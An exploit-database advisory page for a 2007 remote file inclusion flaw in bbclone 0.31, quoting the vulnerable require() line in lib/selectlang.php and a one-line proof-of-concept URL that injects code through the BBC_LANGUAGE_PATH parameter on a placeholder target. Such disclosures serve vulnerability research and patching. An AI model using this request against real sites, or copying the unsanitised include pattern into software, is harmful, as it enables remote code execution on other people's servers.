header-logo
Suggest Exploit
vendor:
by:
Dr Max Virus
N/A
CVSS
N/A
Bug in lib/selectlang.php
CWE
Product Name:
Affected Version From: 0.31
Affected Version To: 0.31
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Script:bbclone

The vulnerability exists in the bbclone script, specifically in the lib/selectlang.php file. The vulnerability is caused by the insecure handling of the BBC_LANGUAGE_PATH parameter. An attacker can exploit this vulnerability by injecting malicious code into the BBC_LANGUAGE_PATH parameter, leading to arbitrary code execution. This vulnerability was discovered by Dr Max Virus in 2007.

Mitigation:

Unknown
Source

Exploit-DB raw data:

------------------------------------------------------------------------------------------------------------------------
Script:bbclone
Affected Version:0.31
Downlaoad:http://sindominio.net/ayuda/bbclone-0.31-esp.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/selectlang.php)
Vul Code;
require($BBC_LANGUAGE_PATH . $BBC_LANGUAGE . ".php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/selectlang.php?BBC_LANGUAGE_PATH=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-23]